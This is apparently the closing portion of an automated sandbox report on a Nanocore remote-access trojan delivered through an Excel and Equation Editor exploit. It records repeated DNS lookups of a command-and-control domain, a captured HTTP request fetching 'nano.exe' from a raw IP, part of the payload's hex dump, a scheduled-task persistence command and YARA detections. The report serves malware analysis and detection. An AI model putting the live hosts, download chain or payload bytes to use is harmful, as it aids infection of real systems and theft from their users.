                          Sep 15, 2021 11:46:12.489511013 CEST8.8.8.8192.168.2.220x95c0No error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:17.598403931 CEST8.8.8.8192.168.2.220xa9a1No error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:17.628771067 CEST8.8.8.8192.168.2.220xa9a1No error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:23.654736042 CEST8.8.8.8192.168.2.220xb26bNo error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:28.841183901 CEST8.8.8.8192.168.2.220x85edNo error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:34.924940109 CEST8.8.8.8192.168.2.220x9b56No error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:40.593792915 CEST8.8.8.8192.168.2.220x7ed9No error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:40.630979061 CEST8.8.8.8192.168.2.220x7ed9No error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:46.707566977 CEST8.8.8.8192.168.2.220x9c5dNo error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:46:51.383151054 CEST8.8.8.8192.168.2.220x465dNo error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)
                          Sep 15, 2021 11:47:08.782804012 CEST8.8.8.8192.168.2.220xcddfNo error (0)newmeforever.3utilities.com79.134.225.19A (IP address)IN (0x0001)

                          HTTP Request Dependency Graph

                          • 207.246.99.155

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.2249167207.246.99.15580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          TimestampkBytes transferredDirectionData
                          Sep 15, 2021 11:45:21.414674044 CEST0OUTGET /covid/nano.exe HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: 207.246.99.155
                          Connection: Keep-Alive
                          Sep 15, 2021 11:45:21.580662966 CEST1INHTTP/1.1 200 OK
                          Date: Wed, 15 Sep 2021 09:45:21 GMT
                          Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
                          Last-Modified: Wed, 15 Sep 2021 08:16:45 GMT
                          ETag: "ff200-5cc0451ab57c1"
                          Accept-Ranges: bytes
                          Content-Length: 1044992
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/x-msdownload
                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed ab 41 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 82 0f 00 00 6e 00 00 00 00 00 00 8a a0 0f 00 00 20 00 00 00 c0 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 a0 0f 00 57 00 00 00 00 e0 0f 00 3c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 80 0f 00 00 20 00 00 00 82 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0f 00 00 02 00 00 00 84 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 3c 6b 00 00 00 e0 0f 00 00 6c 00 00 00 86 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c a0 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 49 0f 00 88 56 00 00 03 00 00 00 48 02 00 06 8c b6 00 00 1c 93 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 16 00 00 0a 02 03 7d 01 00 00 04 02 28 17 00 00 0a 6f 18 00 00 0a 7d 03 00 00 04 2a 00 06 2a 00 00 13 30 03 00 03 01 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 45 08 00 00 00 02 00 00 00 1d 00 00 00 38 00 00 00 5a 00 00 00 75 00 00 00 97 00 00 00 b2 00 00 00 cd 00 00 00 16 2a 02 15 7d 01 00 00 04 02 20 5d f9 34 53 7d 02 00 00 04 02 17 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 a6 bd 51 f9 7d 02 00 00 04 02 18 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 02 7b 04 00 00 04 20 4b 6d da 95 61 7d 02 00 00 04 02 19 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 2c bc c2 c2 7d 02 00 00 04 02 1a 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 02 7b 04 00 00 04 20 14 10 3d 87 61 7d 02 00 00 04 02 1b 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 94 13 e8 f4 7d 02 00 00 04 02 1c 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 22 47 f5 52 7d 02 00 00 04 02 1d 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 16 2a 00 1e 02 7b 02 00 00 04 2a 1a 73 19 00 00 0a 7a 00 32 02 7b 02 00 00 04 8c 2b 00 00 01 2a 00 00 00 13 30 02 00 3c 00 00 00 02 00 00 11 02 7b 01 00 00 04 1f fe 33 1d 02 7b 03 00 00 04 28 17 00 00 0a 6f 18 00 00 0a 33 0b 02 16 7d 01 00 00 04 02 0a 2b 07 16 73 01 00 00 06 0a 06 02 7b 05 00 00 04 7d 04 00 00 04 06 2a 1e 02 28
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELAan @ `@0W<k H.text `.reloc@B.rsrc<kl@@lHIVHz(}(o}**0{E8Zu*} ]4S}}*} Q}}*}{ Kma}}*} ,}}*}{ =a}}*} }}*} "GR}}*}*{*sz2{+*0<{3{(o3}+s{}*(


                          Code Manipulations

                          Statistics

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Start time:11:44:24
                          Start date:15/09/2021
                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Wow64 process (32bit):false
                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                          Imagebase:0x13f530000
                          File size:28253536 bytes
                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Start time:11:44:46
                          Start date:15/09/2021
                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          Wow64 process (32bit):true
                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                          Imagebase:0x400000
                          File size:543304 bytes
                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:11:44:49
                          Start date:15/09/2021
                          Path:C:\Users\Public\vbc.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Users\Public\vbc.exe'
                          Imagebase:0xcd0000
                          File size:1044992 bytes
                          MD5 hash:AD2C14959341C7EC7D72C9FB3B10DEB9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.486948198.00000000026C0000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, Author: Florian Roth
                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, Author: Florian Roth
                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                          Reputation:low

                          General

                          Start time:11:44:52
                          Start date:15/09/2021
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\smsBuojZSZn' /XML 'C:\Users\user\AppData\Local\Temp\tmpC2C3.tmp'
                          Imagebase:0x9f0000
                          File size:179712 bytes
                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:11:44:52
                          Start date:15/09/2021
                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                          Imagebase:0xee0000
                          File size:32768 bytes
                          MD5 hash:72A9F09010A89860456C6474E2E6D25C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.692419310.0000000004780000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.692419310.0000000004780000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, Author: Joe Security
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690789448.0000000000800000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690789448.0000000000800000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.691355428.0000000002390000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.691355428.0000000002390000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.692216842.0000000003971000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.691091752.0000000000DA0000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.691091752.0000000000DA0000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690646997.00000000006E0000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690646997.00000000006E0000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690837400.0000000000A00000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690837400.0000000000A00000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.691004471.0000000000C90000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.691004471.0000000000C90000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690718899.0000000000740000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690718899.0000000000740000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.691135916.0000000000DD0000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.691135916.0000000000DD0000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.691058748.0000000000D40000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.691058748.0000000000D40000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.691079104.0000000000D90000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.691079104.0000000000D90000.00000004.00020000.sdmp, Author: Florian Roth
                          • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                          Reputation:moderate

                          Disassembly

                          Code Analysis

                          Reset < >